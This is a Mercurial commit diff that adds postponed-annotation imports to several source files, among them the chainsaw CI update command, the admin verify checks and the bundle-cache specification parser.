typing: add `from __future__ import annotations` to remaining source files...
Matt Harbison
r52757:1c5810ce default
@@ -1,39 +1,42 @@
1 1 # Copyright (C) 2006 - Marco Barisione <marco@barisione.org>
2 2 #
3 3 # This is a small extension for Mercurial (https://mercurial-scm.org/)
4 4 # that removes files not known to mercurial
5 5 #
6 6 # This program was inspired by the "cvspurge" script contained in CVS
7 7 # utilities (http://www.red-bean.com/cvsutils/).
8 8 #
9 9 # For help on the usage of "hg purge" use:
10 10 # hg help purge
11 11 #
12 12 # This program is free software; you can redistribute it and/or modify
13 13 # it under the terms of the GNU General Public License as published by
14 14 # the Free Software Foundation; either version 2 of the License, or
15 15 # (at your option) any later version.
16 16 #
17 17 # This program is distributed in the hope that it will be useful,
18 18 # but WITHOUT ANY WARRANTY; without even the implied warranty of
19 19 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
20 20 # GNU General Public License for more details.
21 21 #
22 22 # You should have received a copy of the GNU General Public License
23 23 # along with this program; if not, see <http://www.gnu.org/licenses/>.
24 24
25 25 '''command to delete untracked files from the working directory (DEPRECATED)
26 26
27 27 The functionality of this extension has been included in core Mercurial since
28 28 version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now
29 29 the default, unless the extension is enabled for backward compatibility.
30 30 '''
31 31
32 32 # This empty extension looks pointless, but core mercurial checks if it's loaded
33 33 # to implement the slightly different behavior documented above.
34 34
35 35 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
36 36 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
37 37 # be specifying the version(s) of Mercurial they are tested with, or
38 38 # leave the attribute unspecified.
39
40 from __future__ import annotations
41
39 42 testedwith = b'ships-with-hg-core'
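Since every hunk in this change just adds the same two lines, it is worth recalling what they buy. A minimal, self-contained sketch (not from the Mercurial tree) of the PEP 563 behaviour enabled by `from __future__ import annotations`: annotations are stored as strings instead of being evaluated at definition time, so forward references and newer typing syntax stay compatible with the older Python versions Mercurial supports.

from __future__ import annotations


class Node:
    # Without the future import, this forward reference would have to be
    # written as the string "Node"; with it, every annotation is kept
    # un-evaluated, so nothing is looked up at definition time.
    def child(self) -> Node:
        return Node()


print(Node.child.__annotations__)  # {'return': 'Node'}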
@@ -1,12 +1,15 @@
1 from __future__ import annotations
2
3
1 4 def run():
2 5 from . import demandimport
3 6
4 7 with demandimport.tracing.log('hg script'):
5 8 demandimport.enable()
6 9 from . import dispatch
7 10
8 11 dispatch.run()
9 12
10 13
11 14 if __name__ == '__main__':
12 15 run()
@@ -1,226 +1,228 @@
1 1 # chainsaw.py
2 2 #
3 3 # Copyright 2022 Georges Racinet <georges.racinet@octobus.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 """chainsaw is a collection of single-minded and dangerous tools. (EXPERIMENTAL)
8 8
9 9 "Don't use a chainsaw to cut your food!"
10 10
11 11 The chainsaw is a collection of commands that are so much geared towards a
12 12 specific use case in a specific context or environment that they are totally
13 13 inappropriate and **really dangerous** in other contexts.
14 14
15 15 The help text of each command explicitly summarizes its context of application
16 16 and the wanted end result.
17 17
18 18 It is recommended to run these commands with the ``HGPLAIN`` environment
19 19 variable (see :hg:`help scripting`).
20 20 """
21 21
22 from __future__ import annotations
23
22 24 import shutil
23 25
24 26 from ..i18n import _
25 27 from .. import (
26 28 cmdutil,
27 29 commands,
28 30 error,
29 31 localrepo,
30 32 registrar,
31 33 )
32 34 from ..utils import (
33 35 urlutil,
34 36 )
35 37
36 38 cmdtable = {}
37 39 command = registrar.command(cmdtable)
38 40
39 41
40 42 @command(
41 43 b'admin::chainsaw-update',
42 44 [
43 45 (
44 46 b'',
45 47 b'purge-unknown',
46 48 True,
47 49 _(
48 50 b'Remove unversioned files before update. Disabling this can '
49 51 b'in some cases interfere with the update.'
50 52 b'See also :hg:`purge`.'
51 53 ),
52 54 ),
53 55 (
54 56 b'',
55 57 b'purge-ignored',
56 58 True,
57 59 _(
58 60 b'Remove ignored files before update. Disable this for '
59 61 b'instance to reuse previous compiler object files. '
60 62 b'See also :hg:`purge`.'
61 63 ),
62 64 ),
63 65 (
64 66 b'',
65 67 b'rev',
66 68 b'',
67 69 _(b'revision to update to'),
68 70 ),
69 71 (
70 72 b'',
71 73 b'source',
72 74 b'',
73 75 _(b'repository to clone from'),
74 76 ),
75 77 (
76 78 b'',
77 79 b'dest',
78 80 b'',
79 81 _(b'repository to update to REV (possibly cloning)'),
80 82 ),
81 83 (
82 84 b'',
83 85 b'initial-clone-minimal',
84 86 False,
85 87 _(
86 88 b'Pull only the prescribed revision upon initial cloning. '
87 89 b'This has the side effect of ignoring clone-bundles, '
88 90 b'which is often slower on the client side and more stressful '
89 91 b'to the server than applying available clone bundles.'
90 92 ),
91 93 ),
92 94 ],
93 95 _(
94 96 b'hg admin::chainsaw-update [OPTION] --rev REV --source SOURCE --dest DEST'
95 97 ),
96 98 helpbasic=True,
97 99 norepo=True,
98 100 )
99 101 def update(ui, **opts):
100 102 """pull and update to a given revision, no matter what, (EXPERIMENTAL)
101 103
102 104 Context of application: *some* Continuous Integration (CI) systems,
103 105 packaging or deployment tools.
104 106
105 107 Wanted end result: local repository at the given REPO_PATH, having the
106 108 latest changes to the given revision and with a clean working directory
107 109 updated at the given revision.
108 110
109 111 chainsaw-update pulls from one source, then updates the working directory
110 112 to the given revision, overcoming anything that would stand in the way.
111 113
112 114 By default, it will:
113 115
114 116 - clone if the local repo does not exist yet, **removing any directory
115 117 at the given path** that would not be a Mercurial repository.
116 118 The initial clone is full by default, so that clonebundles can be
117 119 applied. Use the --initial-clone-minimal flag to avoid this.
118 120 - break locks if needed, leading to possible corruption if there
119 121 is concurrent write access.
120 122 - perform recovery actions if needed
121 123 - revert any local modification.
122 124 - purge unknown and ignored files.
123 125 - go as far as to reclone if everything else failed (not implemented yet).
124 126
125 127 DO NOT use it for anything other than performing a series
126 128 of unattended updates, with full exclusive repository access each time
127 129 and with no local work other than running build scripts.
128 130 In case the local repository is a share (see :hg:`help share`), exclusive
129 131 write access to the share source is also mandatory.
130 132
131 133 It is recommended to run these commands with the ``HGPLAIN`` environment
132 134 variable (see :hg:`help scripting`).
133 135
134 136 Motivation: in Continuous Integration and Delivery systems (CI/CD), the
135 137 occasional remnant or bogus lock are common sources of waste of time (both
136 138 working time and calendar time). CI/CD scripts tend to grow with counter-
137 139 measures, often added in a hurry. Also, whilst it is neat to keep
138 140 repositories from one job to the next (especially with large
139 141 repositories), an exceptional recloning is better than missing a release
140 142 deadline.
141 143 """
142 144 rev = opts['rev']
143 145 source = opts['source']
144 146 repo_path = opts['dest']
145 147 if not rev:
146 148 raise error.InputError(_(b'specify a target revision with --rev'))
147 149 if not source:
148 150 raise error.InputError(_(b'specify a pull path with --source'))
149 151 if not repo_path:
150 152 raise error.InputError(_(b'specify a repo path with --dest'))
151 153 repo_path = urlutil.urllocalpath(repo_path)
152 154
153 155 try:
154 156 repo = localrepo.instance(ui, repo_path, create=False)
155 157 repo_created = False
156 158 ui.status(_(b'loaded repository at "%s"\n' % repo_path))
157 159 except error.RepoError:
158 160 try:
159 161 shutil.rmtree(repo_path)
160 162 except FileNotFoundError:
161 163 ui.status(_(b'no such directory: "%s"\n' % repo_path))
162 164 else:
163 165 ui.status(
164 166 _(
165 167 b'removed non-repository file or directory '
166 168 b'at "%s"\n' % repo_path
167 169 )
168 170 )
169 171
170 172 ui.status(_(b'creating repository at "%s"\n' % repo_path))
171 173 repo = localrepo.instance(ui, repo_path, create=True)
172 174 repo_created = True
173 175
174 176 if repo.svfs.tryunlink(b'lock'):
175 177 ui.status(_(b'had to break store lock\n'))
176 178 if repo.vfs.tryunlink(b'wlock'):
177 179 ui.status(_(b'had to break working copy lock\n'))
178 180 # If another process relocks after the breaking above, the next locking
179 181 # attempt will have to wait.
180 182 with repo.wlock(), repo.lock():
181 183 ui.status(_(b'recovering after interrupted transaction, if any\n'))
182 184 repo.recover()
183 185
184 186 ui.status(_(b'pulling from %s\n') % source)
185 187 if repo_created and not opts.get('initial_clone_minimal'):
186 188 pull_revs = []
187 189 else:
188 190 pull_revs = [rev]
189 191 overrides = {(b'ui', b'quiet'): True}
190 192 with repo.ui.configoverride(overrides, b'chainsaw-update'):
191 193 pull = cmdutil.findcmd(b'pull', commands.table)[1][0]
192 194 ret = pull(
193 195 repo.ui,
194 196 repo,
195 197 source,
196 198 rev=pull_revs,
197 199 remote_hidden=False,
198 200 )
199 201 if ret:
200 202 return ret
201 203
202 204 purge = cmdutil.findcmd(b'purge', commands.table)[1][0]
203 205 ret = purge(
204 206 ui,
205 207 repo,
206 208 dirs=True,
207 209 all=opts.get('purge_ignored'),
208 210 files=opts.get('purge_unknown'),
209 211 confirm=False,
210 212 )
211 213 if ret:
212 214 return ret
213 215
214 216 ui.status(_(b'updating to revision \'%s\'\n') % rev)
215 217 update = cmdutil.findcmd(b'update', commands.table)[1][0]
216 218 ret = update(ui, repo, rev=rev, clean=True)
217 219 if ret:
218 220 return ret
219 221
220 222 ui.status(
221 223 _(
222 224 b'chainsaw-update to revision \'%s\' '
223 225 b'for repository at \'%s\' done\n'
224 226 )
225 227 % (rev, repo.root)
226 228 )
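As a rough illustration of the intended unattended usage, here is a hedged sketch (not part of this change) of a CI job driving the command above through Mercurial's dispatch machinery; the revision, source URL and destination path are hypothetical.

from mercurial import dispatch

req = dispatch.request(
    [
        b'admin::chainsaw-update',
        b'--rev', b'default',
        b'--source', b'https://example.org/repo',
        b'--dest', b'/ci/workdir/repo',
    ]
)
status = dispatch.dispatch(req)  # non-zero on failure, like the hg CLI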
@@ -1,340 +1,342 @@
1 1 # admin/verify.py - better repository integrity checking for Mercurial
2 2 #
3 3 # Copyright 2023 Octobus <contact@octobus.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 from __future__ import annotations
9
8 10 import collections
9 11 import copy
10 12 import functools
11 13
12 14 from ..i18n import _
13 15 from .. import error, pycompat, registrar, requirements
14 16 from ..utils import stringutil
15 17
16 18
17 19 verify_table = {}
18 20 verify_alias_table = {}
19 21 check = registrar.verify_check(verify_table, verify_alias_table)
20 22
21 23
22 24 # Use this to declare options/aliases in the middle of the hierarchy.
23 25 # Checks like these are not run themselves and cannot have a body.
24 26 # For an example, see the `revlogs` check.
25 27 def noop_func(*args, **kwargs):
26 28 return
27 29
28 30
29 31 @check(b"working-copy.dirstate", alias=b"dirstate")
30 32 def check_dirstate(ui, repo, **options):
31 33 ui.status(_(b"checking dirstate\n"))
32 34
33 35 parent1, parent2 = repo.dirstate.parents()
34 36 m1 = repo[parent1].manifest()
35 37 m2 = repo[parent2].manifest()
36 38 errors = 0
37 39
38 40 is_narrow = requirements.NARROW_REQUIREMENT in repo.requirements
39 41 narrow_matcher = repo.narrowmatch() if is_narrow else None
40 42 for err in repo.dirstate.verify(m1, m2, parent1, narrow_matcher):
41 43 ui.warn(err)
42 44 errors += 1
43 45
44 46 return errors
45 47
46 48
47 49 # Tree of all checks and their associated function
48 50 pyramid = {}
49 51
50 52
51 53 def build_pyramid(table, full_pyramid):
52 54 """Create a pyramid of checks of the registered checks.
53 55 It is a name-based hierarchy that can be arbitrarily nested."""
54 56 for entry, func in sorted(table.items(), key=lambda x: x[0], reverse=True):
55 57 cursor = full_pyramid
56 58 levels = entry.split(b".")
57 59 for level in levels[:-1]:
58 60 current_node = cursor.setdefault(level, {})
59 61 cursor = current_node
60 62 if cursor.get(levels[-1]) is None:
61 63 cursor[levels[-1]] = (entry, func)
62 64 elif func is not noop_func:
63 65 m = b"intermediate checks need to use `verify.noop_func`"
64 66 raise error.ProgrammingError(m)
65 67
66 68
67 69 def find_checks(name, table=None, alias_table=None, full_pyramid=None):
68 70 """Find all checks for a given name and returns a dict of
69 71 (qualified_check_name, check_function)
70 72
71 73 # Examples
72 74
73 75 Using a full qualified name:
74 76 "working-copy.dirstate" -> {
75 77 "working-copy.dirstate": CF,
76 78 }
77 79
78 80 Using a *prefix* of a qualified name:
79 81 "store.revlogs" -> {
80 82 "store.revlogs.changelog": CF,
81 83 "store.revlogs.manifestlog": CF,
82 84 "store.revlogs.filelog": CF,
83 85 }
84 86
85 87 Using a defined alias:
86 88 "revlogs" -> {
87 89 "store.revlogs.changelog": CF,
88 90 "store.revlogs.manifestlog": CF,
89 91 "store.revlogs.filelog": CF,
90 92 }
91 93
92 94 Using something that is none of the above will be an error.
93 95 """
94 96 if table is None:
95 97 table = verify_table
96 98 if alias_table is None:
97 99 alias_table = verify_alias_table
98 100
99 101 if name == b"full":
100 102 return table
101 103 checks = {}
102 104
103 105 # is it a full name?
104 106 check = table.get(name)
105 107
106 108 if check is None:
107 109 # is it an alias?
108 110 qualified_name = alias_table.get(name)
109 111 if qualified_name is not None:
110 112 name = qualified_name
111 113 check = table.get(name)
112 114 else:
113 115 split = name.split(b".", 1)
114 116 if len(split) == 2:
115 117 # split[0] can be an alias
116 118 qualified_name = alias_table.get(split[0])
117 119 if qualified_name is not None:
118 120 name = b"%s.%s" % (qualified_name, split[1])
119 121 check = table.get(name)
120 122 else:
121 123 qualified_name = name
122 124
123 125 # Maybe it's a subtree in the check hierarchy that does not
124 126 # have an explicit alias.
125 127 levels = name.split(b".")
126 128 if full_pyramid is not None:
127 129 if not full_pyramid:
128 130 build_pyramid(table, full_pyramid)
129 131
130 132 pyramid.clear()
131 133 pyramid.update(full_pyramid.items())
132 134 else:
133 135 build_pyramid(table, pyramid)
134 136
135 137 subtree = pyramid
136 138 # Find subtree
137 139 for level in levels:
138 140 subtree = subtree.get(level)
139 141 if subtree is None:
140 142 hint = error.getsimilar(list(alias_table) + list(table), name)
141 143 hint = error.similarity_hint(hint)
142 144
143 145 raise error.InputError(_(b"unknown check %s" % name), hint=hint)
144 146
145 147 # Get all checks in that subtree
146 148 if isinstance(subtree, dict):
147 149 stack = list(subtree.items())
148 150 while stack:
149 151 current_name, entry = stack.pop()
150 152 if isinstance(entry, dict):
151 153 stack.extend(entry.items())
152 154 else:
153 155 # (qualified_name, func)
154 156 checks[entry[0]] = entry[1]
155 157 else:
156 158 checks[name] = check
157 159
158 160 return checks
159 161
160 162
161 163 def pass_options(
162 164 ui,
163 165 checks,
164 166 options,
165 167 table=None,
166 168 alias_table=None,
167 169 full_pyramid=None,
168 170 ):
169 171 """Given a dict of checks (fully qualified name to function), and a list
170 172 of options as given by the user, pass each option down to the right check
171 173 function."""
172 174 ui.debug(b"passing options to check functions\n")
173 175 to_modify = collections.defaultdict(dict)
174 176
175 177 if not checks:
176 178 raise error.Error(_(b"`checks` required"))
177 179
178 180 for option in sorted(options):
179 181 split = option.split(b":")
180 182 hint = _(
181 183 b"syntax is 'check:option=value', "
182 184 b"eg. revlogs.changelog:copies=yes"
183 185 )
184 186 option_error = error.InputError(
185 187 _(b"invalid option '%s'") % option, hint=hint
186 188 )
187 189 if len(split) != 2:
188 190 raise option_error
189 191
190 192 check_name, option_value = split
191 193 if not option_value:
192 194 raise option_error
193 195
194 196 split = option_value.split(b"=")
195 197 if len(split) != 2:
196 198 raise option_error
197 199
198 200 option_name, value = split
199 201 if not value:
200 202 raise option_error
201 203
202 204 path = b"%s:%s" % (check_name, option_name)
203 205
204 206 matching_checks = find_checks(
205 207 check_name,
206 208 table=table,
207 209 alias_table=alias_table,
208 210 full_pyramid=full_pyramid,
209 211 )
210 212 for name in matching_checks:
211 213 check = checks.get(name)
212 214 if check is None:
213 215 msg = _(b"specified option '%s' for unselected check '%s'\n")
214 216 raise error.InputError(msg % (option_name, name))
215 217
216 218 assert hasattr(check, "func") # help Pytype
217 219
218 220 if not hasattr(check.func, "options"):
219 221 raise error.InputError(
220 222 _(b"check '%s' has no option '%s'") % (name, option_name)
221 223 )
222 224
223 225 try:
224 226 matching_option = next(
225 227 (o for o in check.func.options if o[0] == option_name)
226 228 )
227 229 except StopIteration:
228 230 raise error.InputError(
229 231 _(b"check '%s' has no option '%s'") % (name, option_name)
230 232 )
231 233
232 234 # transform the argument from cli string to the expected Python type
233 235 _name, typ, _docstring = matching_option
234 236
235 237 as_typed = None
236 238 if isinstance(typ, bool):
237 239 as_bool = stringutil.parsebool(value)
238 240 if as_bool is None:
239 241 raise error.InputError(
240 242 _(b"'%s' is not a boolean ('%s')") % (path, value)
241 243 )
242 244 as_typed = as_bool
243 245 elif isinstance(typ, list):
244 246 as_list = stringutil.parselist(value)
245 247 if as_list is None:
246 248 raise error.InputError(
247 249 _(b"'%s' is not a list ('%s')") % (path, value)
248 250 )
249 251 as_typed = as_list
250 252 else:
251 253 raise error.ProgrammingError(b"unsupported type %s", type(typ))
252 254
253 255 if option_name in to_modify[name]:
254 256 raise error.InputError(
255 257 _(b"duplicated option '%s' for '%s'") % (option_name, name)
256 258 )
257 259 else:
258 260 assert as_typed is not None
259 261 to_modify[name][option_name] = as_typed
260 262
261 263 # Handle the case where a check is selected without command line options;
262 264 # it will later be filled with the default option values for that check
263 265 for name, f in checks.items():
264 266 if name not in to_modify:
265 267 to_modify[name] = {}
266 268
267 269 # Merge default options with command line options
268 270 for check_name, cmd_options in to_modify.items():
269 271 check = checks.get(check_name)
270 272 func = checks[check_name]
271 273 merged_options = {}
272 274 # help Pytype
273 275 assert check is not None
274 276 assert check.func is not None
275 277 assert hasattr(check.func, "options")
276 278
277 279 if check.func.options:
278 280 # copy the default value in case it's mutable (list, etc.)
279 281 merged_options = {
280 282 o[0]: copy.deepcopy(o[1]) for o in check.func.options
281 283 }
282 284 if cmd_options:
283 285 for k, v in cmd_options.items():
284 286 merged_options[k] = v
285 287 options = pycompat.strkwargs(merged_options)
286 288 checks[check_name] = functools.partial(func, **options)
287 289 ui.debug(b"merged options for '%s': '%r'\n" % (check_name, options))
288 290
289 291 return checks
290 292
291 293
292 294 def get_checks(
293 295 repo,
294 296 ui,
295 297 names=None,
296 298 options=None,
297 299 table=None,
298 300 alias_table=None,
299 301 full_pyramid=None,
300 302 ):
301 303 """Given a list of function names and optionally a list of
302 304 options, return matched checks with merged options (command line option
303 305 values take precedence over default ones)
304 306
305 307 It runs find_checks, then resolves options, and returns a dict of matched
306 308 functions with resolved options.
307 309 """
308 310 funcs = {}
309 311
310 312 if names is None:
311 313 names = []
312 314
313 315 if options is None:
314 316 options = []
315 317
316 318 # find checks
317 319 for name in names:
318 320 matched = find_checks(
319 321 name,
320 322 table=table,
321 323 alias_table=alias_table,
322 324 full_pyramid=full_pyramid,
323 325 )
324 326 matched_names = b", ".join(matched)
325 327 ui.debug(b"found checks '%s' for name '%s'\n" % (matched_names, name))
326 328 funcs.update(matched)
327 329
328 330 funcs = {n: functools.partial(f, ui, repo) for n, f in funcs.items()}
329 331
330 332 # resolve options
331 333 checks = pass_options(
332 334 ui,
333 335 funcs,
334 336 options,
335 337 table=table,
336 338 alias_table=alias_table,
337 339 full_pyramid=full_pyramid,
338 340 )
339 341
340 342 return checks
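For comparison with `check_dirstate` above, an illustrative sketch (not part of this change) of how a check deeper in the hierarchy would be registered, so that the `store.revlogs` prefix and a `changelog` alias both resolve to it through `find_checks`:

@check(b"store.revlogs.changelog", alias=b"changelog")
def check_changelog(ui, repo, **options):
    ui.status(_(b"checking changelog\n"))
    errors = 0
    # hypothetical body: inspect the changelog, count problems, then return
    # the error count just like check_dirstate does
    return errors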
@@ -1,50 +1,52 @@
1 1 # admin_commands.py - command processing for admin* commands
2 2 #
3 3 # Copyright 2022 Mercurial Developers
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 from __future__ import annotations
9
8 10 from .i18n import _
9 11 from .admin import chainsaw, verify
10 12 from . import error, registrar, transaction
11 13
12 14
13 15 table = {}
14 16 table.update(chainsaw.command._table)
15 17 command = registrar.command(table)
16 18
17 19
18 20 @command(
19 21 b'admin::verify',
20 22 [
21 23 (b'c', b'check', [], _(b'add a check'), _(b'CHECK')),
22 24 (b'o', b'option', [], _(b'pass an option to a check'), _(b'OPTION')),
23 25 ],
24 26 helpcategory=command.CATEGORY_MAINTENANCE,
25 27 )
26 28 def admin_verify(ui, repo, **opts):
27 29 """verify the integrity of the repository
28 30
29 31 Alternative UI to `hg verify` with a lot more control over the
30 32 verification process and better error reporting.
31 33 """
32 34
33 35 if not repo.url().startswith(b'file:'):
34 36 raise error.Abort(_(b"cannot verify bundle or remote repos"))
35 37
36 38 if transaction.has_abandoned_transaction(repo):
37 39 ui.warn(_(b"abandoned transaction found - run hg recover\n"))
38 40
39 41 checks = opts.get("check", [])
40 42 options = opts.get("option", [])
41 43
42 44 funcs = verify.get_checks(repo, ui, names=checks, options=options)
43 45
44 46 ui.status(_(b"running %d checks\n") % len(funcs))
45 47 # Done in two passes so the execution is separated from the resolving step
46 48 for name, func in sorted(funcs.items(), key=lambda x: x[0]):
47 49 ui.status(_(b"running %s\n") % name)
48 50 errors = func()
49 51 if errors:
50 52 ui.warn(_(b"found %d errors\n") % errors)
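The same resolution pipeline can be exercised outside the command body; a hedged sketch using the `dirstate` alias registered in `admin/verify.py` (assuming `ui` and `repo` as in the command above):

funcs = verify.get_checks(repo, ui, names=[b"dirstate"], options=[])
for name, func in sorted(funcs.items(), key=lambda x: x[0]):
    errors = func()  # options were already bound by pass_options()
    if errors:
        ui.warn(_(b"found %d errors in %s\n") % (errors, name))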
@@ -1,568 +1,570 @@
1 1 # bundlecaches.py - utility to deal with pre-computed bundle for servers
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 from __future__ import annotations
7
6 8 import collections
7 9 import typing
8 10
9 11 from typing import (
10 12 Dict,
11 13 Union,
12 14 cast,
13 15 )
14 16
15 17 from .i18n import _
16 18
17 19 from .thirdparty import attr
18 20
19 21 # Force pytype to use the non-vendored package
20 22 if typing.TYPE_CHECKING:
21 23 # noinspection PyPackageRequirements
22 24 import attr
23 25
24 26 from . import (
25 27 error,
26 28 requirements as requirementsmod,
27 29 sslutil,
28 30 util,
29 31 )
30 32 from .utils import stringutil
31 33
32 34 urlreq = util.urlreq
33 35
34 36 BUNDLE_CACHE_DIR = b'bundle-cache'
35 37 CB_MANIFEST_FILE = b'clonebundles.manifest'
36 38 CLONEBUNDLESCHEME = b"peer-bundle-cache://"
37 39
38 40
39 41 def get_manifest(repo) -> bytes:
40 42 """get the bundle manifest to be served to a client from a server"""
41 43 raw_text = repo.vfs.tryread(CB_MANIFEST_FILE)
42 44 entries = [e.split(b' ', 1) for e in raw_text.splitlines()]
43 45
44 46 new_lines = []
45 47 for e in entries:
46 48 url = alter_bundle_url(repo, e[0])
47 49 if len(e) == 1:
48 50 line = url + b'\n'
49 51 else:
50 52 line = b"%s %s\n" % (url, e[1])
51 53 new_lines.append(line)
52 54 return b''.join(new_lines)
53 55
54 56
55 57 def alter_bundle_url(repo, url: bytes) -> bytes:
56 58 """a function that exist to help extension and hosting to alter the url
57 59
58 60 This will typically be used to inject authentication information in the url
59 61 of cached bundles."""
60 62 return url
61 63
62 64
63 65 SUPPORTED_CLONEBUNDLE_SCHEMES = [
64 66 b"http://",
65 67 b"https://",
66 68 b"largefile://",
67 69 CLONEBUNDLESCHEME,
68 70 ]
69 71
70 72
71 73 @attr.s
72 74 class bundlespec:
73 75 compression = attr.ib()
74 76 wirecompression = attr.ib()
75 77 version = attr.ib()
76 78 wireversion = attr.ib()
77 79 # parameters explicitly overwritten by the config or the specification
78 80 _explicit_params = attr.ib()
79 81 # default parameter for the version
80 82 #
81 83 # Keeping it separated is useful to check what was actually overwritten.
82 84 _default_opts = attr.ib()
83 85
84 86 @property
85 87 def params(self):
86 88 return collections.ChainMap(self._explicit_params, self._default_opts)
87 89
88 90 @property
89 91 def contentopts(self):
90 92 # kept for Backward Compatibility concerns.
91 93 return self.params
92 94
93 95 def set_param(self, key, value, overwrite=True):
94 96 """Set a bundle parameter value.
95 97
96 98 Will only overwrite if overwrite is true"""
97 99 if overwrite or key not in self._explicit_params:
98 100 self._explicit_params[key] = value
99 101
100 102 def as_spec(self):
101 103 parts = [b"%s-%s" % (self.compression, self.version)]
102 104 for param in sorted(self._explicit_params.items()):
103 105 parts.append(b'%s=%s' % param)
104 106 return b';'.join(parts)
105 107
106 108
107 109 # Maps bundle version human names to changegroup versions.
108 110 _bundlespeccgversions = {
109 111 b'v1': b'01',
110 112 b'v2': b'02',
111 113 b'v3': b'03',
112 114 b'packed1': b's1',
113 115 b'bundle2': b'02', # legacy
114 116 }
115 117
116 118 # Maps bundle version with content opts to choose which part to bundle
117 119 _bundlespeccontentopts: Dict[bytes, Dict[bytes, Union[bool, bytes]]] = {
118 120 b'v1': {
119 121 b'changegroup': True,
120 122 b'cg.version': b'01',
121 123 b'obsolescence': False,
122 124 b'phases': False,
123 125 b'tagsfnodescache': False,
124 126 b'revbranchcache': False,
125 127 },
126 128 b'v2': {
127 129 b'changegroup': True,
128 130 b'cg.version': b'02',
129 131 b'obsolescence': False,
130 132 b'phases': False,
131 133 b'tagsfnodescache': True,
132 134 b'revbranchcache': True,
133 135 },
134 136 b'v3': {
135 137 b'changegroup': True,
136 138 b'cg.version': b'03',
137 139 b'obsolescence': False,
138 140 b'phases': True,
139 141 b'tagsfnodescache': True,
140 142 b'revbranchcache': True,
141 143 },
142 144 b'streamv2': {
143 145 b'changegroup': False,
144 146 b'cg.version': b'02',
145 147 b'obsolescence': False,
146 148 b'phases': False,
147 149 b"stream": b"v2",
148 150 b'tagsfnodescache': False,
149 151 b'revbranchcache': False,
150 152 },
151 153 b'streamv3-exp': {
152 154 b'changegroup': False,
153 155 b'cg.version': b'03',
154 156 b'obsolescence': False,
155 157 b'phases': False,
156 158 b"stream": b"v3-exp",
157 159 b'tagsfnodescache': False,
158 160 b'revbranchcache': False,
159 161 },
160 162 b'packed1': {
161 163 b'cg.version': b's1',
162 164 },
163 165 b'bundle2': { # legacy
164 166 b'cg.version': b'02',
165 167 },
166 168 }
167 169 _bundlespeccontentopts[b'bundle2'] = _bundlespeccontentopts[b'v2']
168 170
169 171 # Compression engines allowed in version 1. THIS SHOULD NEVER CHANGE.
170 172 _bundlespecv1compengines = {b'gzip', b'bzip2', b'none'}
171 173
172 174
173 175 def param_bool(key, value):
174 176 """make a boolean out of a parameter value"""
175 177 b = stringutil.parsebool(value)
176 178 if b is None:
177 179 msg = _(b"parameter %s should be a boolean ('%s')")
178 180 msg %= (key, value)
179 181 raise error.InvalidBundleSpecification(msg)
180 182 return b
181 183
182 184
183 185 # mapping of known parameter names that need their value processed
184 186 bundle_spec_param_processing = {
185 187 b"obsolescence": param_bool,
186 188 b"obsolescence-mandatory": param_bool,
187 189 b"phases": param_bool,
188 190 b"changegroup": param_bool,
189 191 b"tagsfnodescache": param_bool,
190 192 b"revbranchcache": param_bool,
191 193 }
192 194
193 195
194 196 def _parseparams(s):
195 197 """parse bundlespec parameter section
196 198
197 199 input: "comp-version;params" string
198 200
199 201 return: (spec, {param_key: param_value})
200 202 """
201 203 if b';' not in s:
202 204 return s, {}
203 205
204 206 params = {}
205 207 version, paramstr = s.split(b';', 1)
206 208
207 209 err = _(b'invalid bundle specification: missing "=" in parameter: %s')
208 210 for p in paramstr.split(b';'):
209 211 if b'=' not in p:
210 212 msg = err % p
211 213 raise error.InvalidBundleSpecification(msg)
212 214
213 215 key, value = p.split(b'=', 1)
214 216 key = urlreq.unquote(key)
215 217 value = urlreq.unquote(value)
216 218 process = bundle_spec_param_processing.get(key)
217 219 if process is not None:
218 220 value = process(key, value)
219 221 params[key] = value
220 222
221 223 return version, params
222 224
223 225
224 226 def parsebundlespec(repo, spec, strict=True):
225 227 """Parse a bundle string specification into parts.
226 228
227 229 Bundle specifications denote a well-defined bundle/exchange format.
228 230 The content of a given specification should not change over time in
229 231 order to ensure that bundles produced by a newer version of Mercurial are
230 232 readable from an older version.
231 233
232 234 The string currently has the form:
233 235
234 236 <compression>-<type>[;<parameter0>[;<parameter1>]]
235 237
236 238 Where <compression> is one of the supported compression formats
237 239 and <type> is (currently) a version string. A ";" can follow the type and
238 240 all text afterwards is interpreted as URI encoded, ";" delimited key=value
239 241 pairs.
240 242
241 243 If ``strict`` is True (the default) <compression> is required. Otherwise,
242 244 it is optional.
243 245
244 246 Returns a bundlespec object of (compression, version, parameters).
245 247 Compression will be ``None`` if not in strict mode and a compression isn't
246 248 defined.
247 249
248 250 An ``InvalidBundleSpecification`` is raised when the specification is
249 251 not syntactically well formed.
250 252
251 253 An ``UnsupportedBundleSpecification`` is raised when the compression or
252 254 bundle type/version is not recognized.
253 255
254 256 Note: this function will likely eventually return a more complex data
255 257 structure, including bundle2 part information.
256 258 """
257 259 if strict and b'-' not in spec:
258 260 raise error.InvalidBundleSpecification(
259 261 _(
260 262 b'invalid bundle specification; '
261 263 b'must be prefixed with compression: %s'
262 264 )
263 265 % spec
264 266 )
265 267
266 268 pre_args = spec.split(b';', 1)[0]
267 269 if b'-' in pre_args:
268 270 compression, version = spec.split(b'-', 1)
269 271
270 272 if compression not in util.compengines.supportedbundlenames:
271 273 raise error.UnsupportedBundleSpecification(
272 274 _(b'%s compression is not supported') % compression
273 275 )
274 276
275 277 version, params = _parseparams(version)
276 278
277 279 if version not in _bundlespeccontentopts:
278 280 raise error.UnsupportedBundleSpecification(
279 281 _(b'%s is not a recognized bundle version') % version
280 282 )
281 283 else:
282 284 # Value could be just the compression or just the version, in which
283 285 # case some defaults are assumed (but only when not in strict mode).
284 286 assert not strict
285 287
286 288 spec, params = _parseparams(spec)
287 289
288 290 if spec in util.compengines.supportedbundlenames:
289 291 compression = spec
290 292 version = b'v1'
291 293 # Generaldelta repos require v2.
292 294 if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements:
